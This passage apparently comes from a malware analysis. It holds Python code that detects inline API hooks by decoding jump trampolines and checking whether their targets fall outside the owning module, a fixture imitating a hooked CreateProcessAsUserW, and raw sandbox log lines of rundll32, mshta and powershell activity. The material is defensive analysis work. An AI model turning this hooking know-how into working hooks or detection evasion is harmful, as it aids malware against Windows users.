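        disp = struct.unpack_from("<i", code, 2)[0]
        slot = (addr + 6 + disp) & MASK64
        off = slot - addr
        if 0 <= off and off + 8 <= len(code):                     # pointer slot is in view: dereference it
            return ("jmp [rip+disp32]", struct.unpack_from("<Q", code, off)[0])
        return ("jmp [rip+disp32] (slot not in view)", slot)
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return ("mov rax, imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0])
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:    # push imm32; ret (32-bit)
        return ("push imm32; ret", struct.unpack_from("<I", code, 1)[0])
    return None


def check_prolog(name, addr, in_memory, on_disk, module_range):
    """Compare the live prolog with the clean copy and classify any redirect.
    module_range = (base, end) of the module that legitimately owns `addr`."""
    if in_memory[:len(on_disk)] == on_disk:
        return {"function": name, "hooked": False}
    result = {"function": name, "hooked": True, "stub": None, "target": None, "outside_module": None}
    tramp = decode_trampoline(addr, in_memory)
    if tramp:
        stub, target = tramp
        base, end = module_range
        result.update(stub=stub, target=target, outside_module=not (base <= target < end))
    return result


# Constructed fixture (module range, function address and clean bytes are
# illustrative, not taken from the sample): a kernel32 export whose first six
# bytes were overwritten with "jmp [rip+0]" followed by the 8-byte pointer.
# The pointer value is the hook address the report lists for CreateProcessAsUserW.
KERNEL32_RANGE = (0x7FFD9A0B0000, 0x7FFD9A170000)
FUNC_ADDR = 0x7FFD9A0C1000
CLEAN_PROLOG = b"\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10"   # mov [rsp+8],rbx; mov [rsp+10h],rsi
HOOKED_BYTES = b"\xFF\x25\x00\x00\x00\x00" + struct.pack("<Q", 0x7FFD8893521C)

if __name__ == "__main__":
    print(check_prolog("CreateProcessAsUserW", FUNC_ADDR, HOOKED_BYTES, CLEAN_PROLOG, KERNEL32_RANGE))
```

The "outside_module" verdict is what separates a hook from a legitimate patch: Windows does write into its own DLLs (hotpatching, import forwarding through the api-ms apiset stubs), but those redirects land inside a loaded system module, whereas the report's targets at 7FFD889352xx belong to no module explorer.exe loaded from disk.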
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\